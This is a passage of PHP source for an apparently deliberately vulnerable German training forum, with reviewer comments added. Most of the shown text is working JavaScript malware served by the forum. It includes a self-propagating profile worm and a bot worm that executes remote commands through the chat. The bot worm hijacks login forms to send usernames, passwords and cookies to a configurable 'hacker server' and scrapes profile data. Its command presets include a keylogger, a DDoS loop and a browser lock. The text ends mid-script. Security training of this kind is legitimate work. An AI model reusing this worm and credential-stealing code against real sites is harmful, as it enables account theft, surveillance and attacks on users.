[Datei-Freiraum]VARCHAR(20) NULL,
[Status] VARCHAR(8) NULL,
[Rechte] VARCHAR(8) NULL,
[Erstanmeldung] VARCHAR(20) NULL,
[Letzter_Besuch]VARCHAR(20) NULL,
[Letzte_Aktion] VARCHAR(20) NULL,
[Benutzername] VARCHAR(64) NULL,
[Kennwort] VARCHAR(64) NULL,
[Vorname] VARCHAR(64) NULL,
[Nachname] VARCHAR(64) NULL,
[eMail] VARCHAR(255) NULL,
[Homepage] VARCHAR(255) NULL,
[Wohnort] VARCHAR(64) NULL,
[Chat-Status] VARCHAR(255) NULL,
[Geburtstag] VARCHAR(64) NULL,
[Sicherheitsfrage] VARCHAR(96) NULL,
[Geheim-Antwort] VARCHAR(96) NULL,
[Bildschirm] VARCHAR(64) NULL,
[IP-Adresse] VARCHAR(40) NULL,
[SessionID] VARCHAR(64) NULL,
[Browser] VARCHAR(255) NULL);
CREATE TABLE [xss] (
[id] INTEGER NOT NULL PRIMARY KEY,
[create] TIMESTAMP NOT NULL,
[ip] VARCHAR(40) NOT NULL,
[href] VARCHAR(255) NOT NULL,
[data] VARCHAR(255) NULL,
[sess] VARCHAR(255) NULL,
[user] VARCHAR(255) NULL,
[pass] VARCHAR(255) NULL,
[useragent] VARCHAR(255) NULL);";
# Whitespace-separated list of names. They look like the suffixes of PHP's legacy sqlite_* functions
# (array_query, changes, close, ...), presumably used to build a database wrapper - TODO confirm against
# the code that reads $sql[1]; the meaning of the mixed capitalisation is not visible in this part of the file.
$sql[1] = " Array_Query Changes CLose
Create_Function ERror_String Escape_String Exec
Fetch_Array Field_Name Last_Error LibenCoding
LibVersion Master Num_Fields Open
Query Single_Query";
# Initial setup
$eos = 60; // Session lifetime when idle (minutes)
$taz = 24; // Number of textarea rows
$flc = 5; // Number of failed logins allowed
$ctl = 31557600; // 1*365.25*24*60*60 // Maximum lifetime of cookies
$wrt = true; // Check the database structure
$stc = "FireBrick"; // StyleSheet title color
$rel = " rel='nofollow'"; // Search engines should ignore the link
// NOTE(review): target='_blank' is emitted without rel='noopener'; in browsers that do not imply noopener
// the opened page can reach window.opener.
$tgb = " target='_blank'"; // New window for external links
$sel = " class='self'"; // Class for links to the forum itself
$atk = "$rel class='leak'"; // Class for attack links
$lock = '⚷'; # '🔒'; // Lock symbol
$info = array_fill(0,9,""); // Placeholders for dynamic info texts
$dpsk = '/^(lua|src|uid|sha|flc)$/'; // Session filter
$addr = $_SERVER['REMOTE_ADDR']; // IP address of the user
$time = filemtime(__FILE__); // Date of the script
$date = date("d.m.Y",$time); // Modification date
$wiki = 'https://de.wikipedia.org/wiki';// Wikipedia links
$debug = $head = array(); // Initialise debug data & HTML header
$maxfile = 512 * 1024; // Maximum upload size
$register = false; // CMS info test for new registrations
// Prefix pattern for loopback, link-local and private IPv4 ranges plus the "::1" prefix; it is matched
// against $addr further down.
$local = '/^(1(0|27|69\.254|72\.(1[6-9]|2\d|3[01])|92\.168)\.|::1)/'; // Local access
$gqs = (isset($_SERVER['QUERY_STRING'])) ? $_SERVER['QUERY_STRING'] : ""; // Query string
$ncms = '(Abmelden|CMS|Datei|Mail|Profil|Suche)'; // No CMS pages may be created with these names
// The leading comma makes the first list entry the empty string.
// NOTE(review): svg is on the list and SVG files can carry script; how uploads are stored and served is
// outside this part of the file - confirm they are not delivered inline from the forum's origin.
$type = explode(',',',7z,asc,bmp,bpg,csv,gz,ico,jpe,jpeg,jpg,jp2,j2k,mp4,ogg,pdf,png,rtf,svg,tar,tgz,tif,tiff,txt,webp,zip'); // Allowed file types
preg_match('/(.{18})(.+)/',str_pad(0,44,',0'),$sij); // Attack padding for SQL injection
$self = preg_replace('!^[^/]+!','',$_SERVER['SCRIPT_NAME']); // Link to the script
// Absolute URL of the script: scheme from $_SERVER['HTTPS'], host from the Host request header, and the
// server port appended when it is not the scheme's default and not already part of the host.
// NOTE(review): HTTP_HOST is supplied by the client; every absolute link built from $Self inherits that
// value unless the web server restricts the accepted host names.
$Self = ($a = explode(',',(isset($_SERVER['HTTPS']) and $_SERVER['HTTPS'] == 'on') ? '443,s' : '80,'))
? "http$a[1]://$_SERVER[HTTP_HOST]".((":$a[0]" != ($a = ":$_SERVER[SERVER_PORT]") and $a != substr($_SERVER['HTTP_HOST'],-strlen($a))) ? $a : "").$self : '';
$author = "<a href='http://www.mengelke.de/'$tgb>Michael Engelke</a>";
// Optional configuration file. It is included as PHP, so it runs with the full rights of this script, and
// the @ hides any error it raises.
// NOTE(review): extract() with its default flags overwrites variables that already exist, so the file can
// replace every setting made above, including $leak. Keep the file out of reach of the web server's write
// access, and initialise $cfg / $CFG before the include so that nothing except the file can populate them.
if($config and file_exists($config)) // Alternative config file
@include $config; // Load the config data
if(isset($cfg)) // Replace dynamic variables
extract($cfg); // foreach($cfg as $key => $var) $GLOBALS[$key] = $var;
// $CFG is a two-level array: its entries are merged key by key into global arrays of the same name.
if(isset($CFG)) // Extend dynamic variables
foreach($CFG as $key => $var)
foreach($var as $k => $v)
$GLOBALS[$key][$k] = $v;
$uid = false; // No user ID
$status = 0; // No privileges
// Search text: taken verbatim from ?q=, or base64-decoded from ?b= after blank and '-' are mapped to '+'
// and '_' to '/'. Neither form is filtered here, so each place that uses $q has to escape it for its own
// context (HTML, SQL, URL).
$q = (isset($_GET['q'])) ? $_GET['q'] : ((isset($_GET['b'])) ? base64_decode(strtr($_GET['b'],array(' ' => '+', '-' => '+', '_' => '/'))) : false);
// Section selector: exactly one of the letters b, c, d, f, m.
$s = (isset($_GET['s']) and preg_match('/^[bcdfm]$/',$_GET['s'],$var)) ? $var[0] : false;
// Numeric parameters: the patterns are not anchored, but only the matched run of digits (with an optional
// leading '-' for user and sort) is kept, never the raw parameter.
$id = (isset($_GET['id']) and preg_match('/\d+/',$_GET['id'],$var)) ? $var[0] : false;
$mid = (isset($_GET['user']) and preg_match('/-?\d+/',$_GET['user'],$var)) ? $var[0] : false;
$sort = (isset($_GET['sort']) and preg_match('/-?\d+/',$_GET['sort'],$var)) ? $var[0] : false;
// First run of word characters of the mode parameter, read from $_REQUEST.
$mode = (isset($_REQUEST['mode']) and preg_match('/\w+/',$_REQUEST['mode'],$var)) ? $var[0] : false;
// Extra path behind the script name: PATH_INFO, else cut out of REQUEST_URI, else a request parameter
// named PATH_INFO.
$path = (isset($_SERVER['PATH_INFO'])) ? $_SERVER['PATH_INFO'] : ((preg_match('!'.preg_quote(basename(__FILE__),'!').'(/[^?#]+)!',$_SERVER['REQUEST_URI'],$var)) ? $var[1] : ((isset($_REQUEST['PATH_INFO'])) ? $_REQUEST['PATH_INFO'] : null));
// Requested page name: from the request parameter with everything except word characters, '.' and '-'
// removed, else the first segment of $path.
$request = (isset($_REQUEST['request'])) ? preg_replace('/[^\w.-]/','',$_REQUEST['request'])
: (($path and preg_match('/^\/([\w.-]+)/',$path,$var)) ? $var[1] : false);
// Query string; when PATH_INFO arrived as a request parameter, everything up to and including the first
// '&' is dropped.
$query = (isset($_REQUEST['PATH_INFO'])) ? preg_replace('/^[^&]*./','',$gqs) : $gqs;
// Pattern/replacement lists derived from $html (defined outside this part of the file): in every key a '&'
// is rewritten so that it does not match the start of an existing entity, then the key is wrapped as a
// case-insensitive pattern.
$phtml = array(preg_replace(array('/&/','/.+/'),array('&(?!(\w+|#\d+|#x[\da-f]+);)','/$0/i'),array_keys($html)),array_values($html));
$uedit = false;
// $array holds references, so the replacements below change $attack, $hash and $jschat['crypt'] themselves.
$array = array(&$attack,&$hash,&$jschat['crypt']); // Turn all external links into local ones if the local file exists
// Replace the pattern in $local by the result of matching it against the client address (1 or 0).
// NOTE(review): REMOTE_ADDR is the address of the direct peer. If the forum is deployed behind a reverse
// proxy with a private or loopback address, every visitor matches and is treated as local.
if(is_string($local))
$local = preg_match($local,$addr);
// For every http(s)/ftp(s) URL in the three arrays: when a file with the URL's basename exists below $home,
// the entry becomes an absolute URL to that local copy; otherwise only the "#..." fragment is removed.
if($home)
foreach($array as $key => $var)
foreach($var as $k => $v)
if(preg_match('!^(ht|f)tps?://!',$v))
$array[$key][$k] = (@file_exists($val = "$home/".basename($v))) ? preg_replace(array('!(?<=^|/)([^/]+\.)?\./|/(?=/)!','!^(?=/)!'),array('',substr($Self,0,-strlen($self))),preg_replace('![^/]*$!','',$self)."/$val") : preg_replace('/\s*#.*$/','',$v);
// $pass is defined outside this part of the file; it is sorted for the requests Kennwort, Profil,
// Anmelden, Daten and Bearbeiten.
if(preg_match('/^(Kennwort|Profil|(Anmeld|(Da|Bearbei)t)en)$/',$request)) // Sort the password questions
sort($pass);
// Paging parameter "page=<position>[,<entries per page>]" (',', '/' or '-' as separator). The whole value
// must match the anchored pattern; the entries-per-page part is clamped to $paging[0]..$paging[2] and
// defaults to $paging[1].
if(isset($_GET['page']) and preg_match('/^(\d*)(?:[,\/-](\d+))?$/',$_GET['page'],$var)) {
$page = array($var[0],"page=$var[0]");
$max = max(min(((isset($var[2])) ? $var[2] : $paging[1]),$paging[2]),$paging[0]);
}
else {
$page = array("","");
$max = $paging[1];
}
// A posted "stop" field redirects the request: to $mode when one was given, otherwise Admin -> start page,
// Bearbeiten -> Profil, CMS stays, and every other request is cleared. The elseif chain belongs to the
// inner if($mode), so none of it runs without the "stop" field.
if(isset($_POST['stop']))
if($mode)
$request = $mode;
elseif($request == 'Admin')
$request = '';
elseif($request == 'Bearbeiten')
$request = 'Profil';
elseif($request != 'CMS')
$request = false;
// No page requested (the loose comparison also matches false): let the section selector choose Blog or
// Mail. For Mail the user id falls back to the id parameter.
if($request == '')
if($s == 'b')
$request = 'Blog';
elseif($s == 'm') {
$request = 'Mail';
if(!$mid and $id)
$mid = $id;
}
// Collect the query parameters that are carried over into generated links ($getopt).
// NOTE(review): the alternation in '/^\d+|[cd]$/' means "starts with digits" OR "ends with c or d", not
// "consists of digits or is c/d", and the raw $_GET[id] (not the filtered $id) is appended. Where $getopt
// is written into the page is outside this part of the file. If this is not one of the forum's deliberate
// demonstration leaks, anchor the whole alternative, e.g. '/^(\d+|[cd])$/'.
// NOTE(review): the comparison uses 'Profile' while the rest of this section uses 'Profil' - confirm
// which spelling is intended.
if(isset($_GET['id']) and preg_match('/^\d+|[cd]$/',$_GET['id']) and $request != 'Profile')
$getopt[] = "id=$_GET[id]";
if($s)
$getopt[] = "s=$s";
// The search text is URL-encoded before it is added.
if($q)
$getopt[] = "q=".urlencode($q);
// Only a non-default page size is carried over.
if($max != $paging[1])
$getopt[] = "page=,$max";
if($request == 'Mail')
$getopt[] = "s=m";
if($request == 'Blog')
$getopt[] = "s=b";
if(isset($_GET['new']))
$getopt[] = "new=1";
// $out collects the page output; it is kept when it was already set (for example by the config file).
if(!isset($out))
$out = '';
$row = false;
# Allow the zlib calls to be adapted
# Each operation the script uses gets an entry in $gz that names the function to call. Entries that are
# already set (presumably by the config file) are kept; all others default to "gz" + operation name.
foreach(array('open','close','eof','file','read','write','encode','deflate','inflate') as $var) {
	if(isset($gz[$var]))
		continue;
	$gz[$var] = 'gz'.$var;
}
# Deliver the built-in graphics
# Handles the request "img" with an image number in the query string. All entries of $img except the last
# are byte lengths; the last one ($img[1]) is the base64-encoded, deflated data block. The requested image
# is cut out of the inflated block at the offset given by the sum of the preceding lengths.
if($request == 'img' and $img and preg_match('/\d+/',$query,$var)) {
$array = array_values(array_slice($img,0,-1));
// An index beyond the list falls back to image 0, so the substr() below stays inside the table.
$var = ($var[0] < count($array)) ? $var[0] : 0;
if($cache) {
// From here on $date is the script's modification time in HTTP date format.
$date = gmdate("D, d M Y H:i:s",$time)." GMT";
header("Cache-Control: public");
header("Etag: $time");
// Answer 304 when both validators match, read either through apache_request_headers() or from $_SERVER.
// "and" binds tighter than "or", so the condition is (first four tests) or (last four tests).
if(($val=(function_exists("apache_request_headers")) ? apache_request_headers() : array())
and isset($val["If-None-Match"]) and isset($val["If-Modified-Since"])
and $val["If-None-Match"] == $time and $val["If-Modified-Since"] == $date
or isset($_SERVER["HTTP_IF_NONE_MATCH"]) and isset($_SERVER["HTTP_IF_MODIFIED_SINCE"])
and $_SERVER["HTTP_IF_NONE_MATCH"] == $time and @$_SERVER["HTTP_IF_MODIFIED_SINCE"] == $date) {
header("HTTP/1.1 304 Not Modified");
exit();
}
header("Pragma: public");
header("Last-Modified: $date");
header("Cache-Control: public, max-age=".($eos*60));
}
// The last image in the table is sent as an icon, all others as GIF.
header('Content-Type: image/'.(($var == count($array)-1) ? 'x-icon' : 'gif'));
// $gz['inflate'] names the function that is called to decompress the block.
die(substr($gz['inflate'](base64_decode($img[1])),array_sum(array_slice($array,0,$var)),$array[$var]));
}
# Let the deliberate vulnerabilities be switched off by cookie
# $leak is the master switch from the configuration. The "leak" cookie can only switch the vulnerabilities
# off for one browser; it cannot switch them on when $leak is false.
if(!$leak)
$leak = 0;
else {
// Request "Leak" toggles the cookie: an existing, falsy cookie is deleted (expiry in the past), otherwise
// a session cookie leak=0 is set. $_COOKIE still holds the value the browser sent with this request.
if($request == 'Leak') {
$out = "<h3>Sichheitslücken wurden ";
if(isset($_COOKIE['leak']) and !$_COOKIE['leak'])
setcookie('leak',1,time()-$ctl,$self);
else {
setcookie('leak',0,0,$self);
$out .= "de";
}
$out .= "aktiviert!</h3>";
}
if(isset($_COOKIE['leak']))
$leak = ($_COOKIE['leak']) ? $leak : false;
// PHP code injection mode ($leak = 1) is entered when it is configured explicitly ($leak === 1), or when
// the vulnerabilities are on and the request comes from a loopback address that equals the server address
// ("and" binds tighter than "or").
// NOTE(review): when a reverse proxy runs on the same host, REMOTE_ADDR and SERVER_ADDR can both be a
// loopback address for every visitor, which would enable this mode for all of them. Run the forum only in
// an isolated lab network, as its own notice below says.
if($leak === 1 or $leak and (preg_match('/^(127(\.\d+){3}|localhost|::1)$/i',$_SERVER['REMOTE_ADDR'])
and isset($_SERVER['SERVER_ADDR']) and $_SERVER['SERVER_ADDR'] == $_SERVER['REMOTE_ADDR'])) { // Enable PHP code injection
$leak = 1;
// Rebuild $creole with a changed first key: the text "89" in that key becomes \d and every '$' is removed;
// its value and all other entries stay as they are. The key itself is defined outside this part of the file.
$creole = array_merge(array(str_replace(array(89,'$'),array('\d',''),key(array_slice($creole,0,1))) => current(array_slice($creole,0,1))),array_slice($creole,1));
$info[0] = ", [[^Creole]]-Formatierung";
}
elseif($leak)
$info[1] = "//PHP-[[::W/)Code_injection|+]] wurde aus Sicherheitsgründen im [[::w/)Quelltext]] deaktiviert. Und sollte nur im abgeschotteten [[::w/Local_Area_Network|Lokalen Netzwerk]] aktiviert und getestet werden!//\n";
}
if($leak) {
// A "to" cookie holding an http(s) URL replaces the destination used by the demonstration scripts.
// NOTE(review): the cookie value is placed between single quotes without escaping and is later pasted
// into generated JavaScript; the pattern \S+ does not exclude quote characters.
if(isset($_COOKIE['to']) and preg_match('!^https?://\S+!',$_COOKIE['to'],$var))
$attack['_jsleak_'] = "'$var[0]'";
$info[2] = "**Alle Daten werden in Klartext gespeichert und können durch ??ak?? ausgelesen werden!**\n";
$info[7] = " (//Nur im [[^Leak^Sicherheitslücken ein/aus Schalten^|Sicherheitsmodus]]//)";
// The hint in $info[5] is shown only while the destination is not an absolute http(s) URL.
if(!preg_match('!^[\'"]?https?://!',$attack['_jsleak_']))
$info[5] = "Aus Sicherheitsgründen sind die ??ak?? mit relativen bzw. lokalen [[::w/)Pfad(name]]en entwickelt worden, so dass die Daten das ??if?? nie wirklich verlassen. //(Mit dem Nachteil, dass viele [[::w/Sicherheitssoftware|Security-Systeme]] die ??ak?? als ungefährlich einstufen.)//";
}
else
// With the vulnerabilities off, the [worm] and [xss] tables are removed from the schema text.
$sql[0] = preg_replace('/CREATE TABLE\s*\[(worm|xss)\][^;]+;/s','',$sql[0]);
# "Externen" Angriffs-Code (JavaScript) zurückgeben
// Demonstration script for the forum's tagline exercise, stored as a string in $attack['_worm_'].
// Everything inside the double-quoted string, including its // comments, is JavaScript text that is sent
// to the browser, so it is left untouched here. The destination is whatever $attack['_jsleak_'] holds:
// by default the expression location.pathname (same origin), or the URL from the "to" cookie when the
// vulnerabilities are switched on. The assignment itself runs on every request; the string is only served
// by the request handler that follows, which is guarded by $leak.
$attack['_worm_'] = "<script>". /* Tagline worm */"
new Image().src = $attack[_jsleak_] + '?tl=' // Kopier-Adresse setzen
+ encodeURIComponent(document.getElementById('tl').innerHTML) // Kompletten Code kopieren
</script>";
if($leak and preg_match('/^(worm(line|test|y?)|(bnps))(?:\.(js|txt))?$/i',$request,$var)) { // Tiny-Profil-Wurm
$code = false;
$val = strtolower($var[1]);
if(substr($val,0,4) == 'worm') {
if($var[2] == 'test' and isset($worm))
$code = $worm;
elseif($var[2] == 'line')
$code = $attack['_worm_'];
elseif($var[2] == 'y')
$code = "Wormy was here!".((isset($query) and $query != '' and preg_match('!^https?://!',$query))
? "\n<p style='display:none'><iframe src='$gqs'></iframe></p>" : '')."<script>
try { var O = new XMLHttpRequest(); } // HTTP für Moderne Browser festlegen
catch(e) { O = new ActiveXObject('Microsoft.XMLHTTP'); } // HTTP für Internet Explorer festlegen
O.open('POST',location.pathname.replace(/(\.php\d*)(\/\w+)?$/,'$1/Bearbeiten'),false); // Benutzer-Profil mit Wurm aktualisieren
O.setRequestHeader('Content-Type','application/x-www-form-urlencoded'); // POST-Request ermöglichen
O.send('profil=' + encodeURIComponent(document.getElementById('profil').innerHTML // Komplettes Benutzerprofil auslesen
.replace(/^[^\\0]*?([^<>]*(?:<(p).*?<\/\\2>)?\s*<(script>)[^\\0]*?<\/\\3)$/i,'$1'))); // Nur den Wurm selber kopieren
</script>";
elseif($var[2] == '')
$code = "<script id='worm' title=\"". /* Umfangreicher Profil-BotWurm mit Tarnung */"
var J,S = [], W,O,R,M = ['0', -1, 10, 0, // M0-3 => Referrer, BotChatID, BotDelay, ReloadDelay
$attack[_jsleak_], // M4 => Hacker-Server
location.pathname.replace(/(\.php\d*).*$/,'$1')], // M5 => Url zum Forum
X = function(R) { // Daten Senden [ url, data ] (O,R)
top.window.bot = new Date().getTime(); // Wurm temporär fixieren (Aktuelle Zeit)
try { O = new XMLHttpRequest() } // HTTP für Moderne Browser festlegen
catch(e) {O = new ActiveXObject('Microsoft.XMLHTTP')} // HTTP für Internet Explorer festlegen
O.open((R[1] ? 'POST' : 'GET'),R[0],false); // GET oder POST-Request absenden
if(R[1]) {
O.setRequestHeader('Content-Type','application/x-www-form-urlencoded');// Post-Request Methode festlegen
O.setRequestHeader('Content-Length',R[1].length);
}
O.send(R[1] ? R[1] : ''); // Daten abschicken".((isset($_COOKIE['debug']) and $_COOKIE['debug']) ? "
R = R[0] + '\\x20->\\x20' + unescape(R[1]) + '\\n' + O.responseText; // Wurm-Requests Debuggen
if(top.jsdebug) top.jsdebug(R); else if(jsdebug) jsdebug(R); // Logs in Debug-Console ausgeben" : "")."
return O.responseText; // Ergebnis zurück
},
Y = function(Y) { // Kurzform für encodeURIComponent
return encodeURIComponent(Y);
},
Z = function(W) { // BotNet [ CC-ID ] (J,W,O,R,M)
if((O=X([M[7],'chat=news:'+M[1]]) // Neue Befehle abrufen, Prüfen und ausführen
.match(/;-?(\d+),(\d+),(?:<!--\s*)?807:([\d-]+),([\d-]+),([^\\0]+?)(\/\/-->|;|$)/)) && W < O[3]) {
R = W, // Aktuelle CC-ID zum Auslesen merken
W = O[3]; // aktuelle Command-ID merken
if(O[4] == 0 || O[4] == M[9]) { // Befehl für Alle oder nur für den einen Bot
J++; // Counter für Empfangene Befehle
try { R = eval(O[5].replace(/%3b/ig,';').replace(/%25/g,'%')) } // Befehl ausführen
catch(e) { R = '3rr0r:%20' + e; } // Fehler zurückgeben
if(R) // Rückgabewert zurückschicken
X([M[7],'chat=call:0,' + Y(R)]);
}
}
if(M[3] && (M[3] -= M[2]) <= 0) // Zwangslogoff zuvorkommen
top.location.reload();
if(W >= 0) // Ein paar Sekunden warten
setTimeout('Z(' + W + ')',M[2] * 1e3);
};
window.onload = function() { // Warten bis Seite komplett geladen ist (W,O,J,M)
if((J = document.getElementsByTagName('meta'))) // Den Timeout-Refesh in Meta-Tags suchen
for(O=0;O<J.length;O++)
if(J[O].httpEquiv == 'refresh')
M[3] = parseInt(J[O].content.match(/(\d+)(?=.*?url=)/i)[1],10) - 300;// 5 Minuten vor Timeout
if((J=document.profile)&&(W=J.profil.value.match(/^([^\\0]*?)(\s+<script[^\\0]+?id=(.?)worm\\3[^\\0]*)$/i))) // Profil?
M[8] = W[2], J.profil.value = W[1], J.onsubmit = function() { // M8 => Wurm verstecken (M)
document.profile.profil.value += M[8]; // Beim speichern Wurm mit dranhängen
};
M[7] = M[5] + '/Chat'; // M7 => Botnet über Chat
M[9] = (J = document.getElementsByTagName('head')[0].innerHTML.match(/Atom\?id=(\d+)\./)) ? J[1] : 0; // M9 => User-ID
M[10] = new Date().getTime(); // M10 => Startzeit des Bot festhalten
Z(J = 0); // BotNet Starten
};
if((J = document.login)) // Login-Fenster Modifizieren, wenn es existiert
J.action = location.href, J.onsubmit = function() { // Beim Absenden eine Funktion ausführen (J,M)
J = document.login;
if(J.username.value || J.password.value) // Wenn Formular ausgefüllt ist,
X([M[4] + '?href=' + Y(location.host + location.pathname) // Logindaten zum Hacker schicken
+ '&data=' + Y(document.cookie + '; user=' + J.username.value
+ '; pass=' + J.password.value) + '&useragent=' + Y(navigator.userAgent)]);
};
if((R=(J=X([M[6]=M[5] + '/Bearbeiten?id'])).match(/(<td[^>]*>.*?(<\/td>)<td[^>]*>.*?\\2)/g))) // M6 => Profil-Link
for(W=0;W<R.length;W++)
if((O = R[W].match(/><b>(.*?):<\/b><\/td><td[^>]*>(?!<em>)(.*?)<\/td>/))) { // Profildaten Suchen
S[W] = Y(O[1]) + '=' + Y(O[2].replace(/<\/?\w+[^>]*>/g,'')); // Daten rausfischen
if((O = O[2].match(/<a .*?onClick='alert\(\w+\([^%]+([\w%]*)/)))
S[W] = S[W].replace(/[^=]*$/,Y(unescape(O[1]))); // Password dekodieren
if((O = R[W].match(/<a.href='(?!#)(?:mailto:)?([#-&,-z]+)/)))
S[W] = S[W].replace(/[^=]*$/,Y(O[1])); // Link dekodieren
}
if(S.length) // Alle Persönlichen Daten zum Hacker schicken!
O = new Image(), O.src = ".preg_replace('/^.+$/',((isset($_COOKIE['debug']) and $_COOKIE['debug'])
? "((top.jsdebug && (S = $0))\n\t\t? top.jsdebug(S) : ((jsdebug) ? jsdebug(S) : S))" : "$0"),
"M[4] + '?worm=1&referer=' + M[0] + '&' + S.join('&')")."; // S kann vom Bot weiter bearbeitet werden
if(!J.match(/ id=(.?)worm\\1|,W,O,R,M=/i) && (O=J.match(/<tex.area.*?>([^\\0]*)<\/tex.area>/))) { // Wurm vorhanden?
if(!O[1].length) // Benutzer hat noch kein Profiltext
O = J.match(/[<]div id='profil'>([^\\0]*)<\/div>[<]\/fieldset>/);
for(S=0;S<80;S++) // Wurm mit 80 Leerzeilen verstecken
O[1] += '\\n';
X([M[6],'profil=' + Y(O[1] + (document.getElementById('worm').outerHTML).replace(/'([\d,]+)(?=',)/, // Wurm Kopieren
'\'' + M[0] + ',' + ((O = document.getElementsByTagName('body')[0].innerHTML.match(/\?mail=(\d+).>Mail an/)) // get UID
? O[1] : ((O = location.href.match(/[?&]id=([\d,]+)/)) ? O[1] : '?'))))]); // Alternativ UID & Abstammung erweitern
} // V- Wurm nur Laden, wenn er noch nicht gestartet wurde oder der Bot 30 Sekunden inaktiv war
\">if(!top.window.bot || new Date().getTime() - top.window.bot > 3e4) // Bot nur einmal starten oder bei 30 sec inaktivtät
eval(document.getElementById('worm').title);</script>";
}
elseif($val == 'bnps') // Angriffs-Presets für den Control-Center
$code = strtr(<<<eof
a.push(
"!Report Bot", // Infos über den Bot und den Browser
"a = function(b) {return b.toUTCString().match(/((?!00)\d\d:)?\d\d:\d\d(?=\s)/)[0];};
'ID:' + W + ' Ref:' + M[0] + ',' + M[9] + ' Wait:' + M[2]
+ ' Timeout:' + a(new Date(M[3] * 1000)) + ' Runtime:' + a(new Date(new Date().getTime()-M[10]))
+ ' Count:' + J + ' ' + top.location.href + '%0aUserAgent:' + navigator.userAgent",
"!Get Bot Time", // Lokale Zeit des Bots ausgeben
"new Date().toString()", // new Date().toLocalString()
"!Reload Bot", // Aktuelle Seite neuladen (Bot neu starten)
"if(J > 1) {
top.location.reload();
'Reloaded'
}",
"!Remove Bot", // Selbst Zerstörung (Profil bleibt erhalten)
"X([M[6],'profil=' + Y(X([M[6]]).match(/[<](textarea).*?>([^\\0]*?)\s+(&(amp;)?lt;|<)script\s(id|title)=[^\\0]+?<\/\\1>/)[2])]);
'Removed'",
"!Sleep Bot", // Bot deaktivieren
"if(J > 1) {
W = -1;
'Sleeping...'
}",
"Chat: Decrypt-Text", // Verschlüsselte Chat-Nachricht entschlüsseln (Nur beim Sender/Empfänger möglich)
"top.CryptoJS.AES.decrypt('##var##'.replace(/^\w+\//,''),top.window.name.replace(/^key:[\w,]+,(?=\w+$)/,'')).toString(top.CryptoJS.enc.Utf8);",
"Chat: Get Keys", // Secret, Public und Script-Keys anzeigen
"a = top.F, b = top.window.name.replace(/^key:/,'').split(',');
(a ? 'n=' + a[2] + '%0ag=' + a[1] + '%0ap=' + a[0] + '%0a' : '') + 'a=' + b[0] + '%0aA=' + b[1] + '%0aK=' + b[2] + '%0a'",
"Debug-Infos", // Alle Bot-Variabeln zurückgeben
"M.join('%0a') + '%0a***%0a' + O.join('%0a') + '%0a***%0a' + [J,S,W].join('%0a')",
"DDoS-Attack,$attack[_xlink_]", // Eine Webseite unter Dauerbeschuss setzen
"a = ['##var##','DDoS-Attack','name','DoS','id','DoS','style','display:none'],
b = top.document.createElement('iframe');
for(c=2;c<a.length;c+=2)
b.setAttribute(a[c],a[c+1]);
top.document.body.appendChild(b);
top.frames.DoS.document.write('<form name=\'DDoS\' target=\'tDDoS\' action=\'' + a[0] + '\' method=\'POST\'>
<input type=\'hidden\' name=\'q\' value=\'' + a[1] + '\'></form><iframe name=\'tDDoS\'></iframe>
<script>setInterval(function(){document.forms[\'DDoS\'].submit()},1000)</script>');
'Open Fire'",
"DDoS-STOP", // Waffenruhe
"if((a = top.document.getElementById('DoS')))
a.parentNode.removeChild(a);
'Peace'",
"Fenster-Titel,Hello World!", // Fenster-Titel ändern
"top.document.getElementsByClassName('title')[0].innerHTML = '##var##'",
"Hacked-Info,Y0u h4v3 b33n H4ck3d!", // Nachricht an den User schicken
"while(confirm('##var##'));
'Confirm'",
"Home-Profil,/Profil", // Das Benutzer-Profil aufrufen
"if(J > 1)
top.location.href = M[5] + '##var##'",
"Keylogger (Bugy)", // Alle Tasten loggen und alle 10 Sekunden zum Hacker schicken
"var a,K = '';
top.document.onkeypress = function(e) {
a = window.event ? event : e;
K += String.fromCharCode(a.keyCode ? a.keyCode : a.charCode);
};
window.setInterval(function() {
if(K != '')
X([M[7],'chat=call:0,' + Y(K)]);
K = '';
},10000);
'Keys logging'",
"Lock Browser,##pass##", // Browserfenster mit Kennwort sichern
"a = top.document.createElement('div');
a.setAttribute('style','position:fixed; top:0; left:0; width:100%; height:100%; background-color:rgba(0,0,0,0.7);');
top.document.body.appendChild(a);
b = 1;
while(prompt('Enter Password!') != '##var##')
b++;
a.parentNode.removeChild(a);
b + ' try(s)'",
"Place Kitten,$attack[_clink_]", // Alle Standart-Grafiken durch Katzenbilder ersetzen
"for(d=0;d<top.document.images.length;d++)
top.document.images[d].src = '##var##/' + top.document.images[d].width + '/' + top.document.images[d].height + '?' + d;
a = top.document.getElementsByTagName('*');
for(b=0; b < a.length; b++)
if((c = top.window.getComputedStyle(a[b])) && c.backgroundImage && c.backgroundImage != 'none')
a[b].style.backgroundImage = 'url(##var##/' + parseInt(c.width) + '/' + parseInt(c.height) + '?' + d++ + ')';
d + ' Placed'",
"Popup-Layer,468 60 $attack[_blink_]", // Popup Öffnen
"a = top.document.createElement('div'),
b = '##var##'.match(/^(\d+)\D(\d+)\D(.*)$/);
a.setAttribute('style','position:fixed; width:' + (parseInt(b[1]) + 20) + '; height:' + (parseInt(b[2]) + 20) + '; border: 1px solid black;
background-color:white; top:50%; left:50%; transform:translate(-50%,-50%); -webkit-transform:translate(-50%,-50%);');
a.setAttribute('id','popup');
a.innerHTML = '<a style=\'position:absolute; top:-10; left:' + (parseInt(b[1]) + 10 ) + ';
width:20; border-radius:10px; text-align:center; background-color:red; color:white;\'
onclick=\'(a=top.document.getElementById(/popup/.source)).parentNode.removeChild(a)\' title=\'Close\'>X</a>
<iframe src=\'' + b[3] + '\' width=\'' + b[1] + '\' height=\'' + b[2] + '\' style=\'width:100%; height:100%\'></iframe>';
top.document.body.appendChild(a);
'Poping up'",
"Rick Rolling,640 480 $attack[_ylink_]",// Musikvideo abspielen
"a = top.document.createElement('div');
b = ['style','position:fixed; top:0; left:0; width:100%; height:100%; background-color:rgba(0,0,0,0.7);',
'ondblclick','this.parentNode.removeChild(this);','id','ricknroll'];
for(c=0;c<b.length;c+=2)
a.setAttribute(b[c],b[c+1]);
b = '##var##'.match(/^(\d+)\D(\d+)\D(.*)$/);
a.innerHTML = '<iframe src=\'' + b[3] + '\' width=\'' + b[1] + '\' height=\'' + b[2] + '\' frameborder=\'0\'
style=\'position:fixed; top:50%; left:50%; transform:translate(-50%,-50%); -webkit-transform:translate(-50%,-50%);\'></iframe>';
top.document.body.appendChild(a);
'Rick\'n\'Roll'",
"Rick Killing", // Musikvideo entfernen
"if((a = top.document.getElementById('ricknroll'))) {
a.parentNode.removeChild(a);
'Rick killed'
}",
"WebRTC-IPs,2000", // Lokale/Externe IP-Adresse des Bots ausgeben
"a = top.document.createElement('iframe');
a.setAttribute('id','iframe');
a.setAttribute('style','display:none');
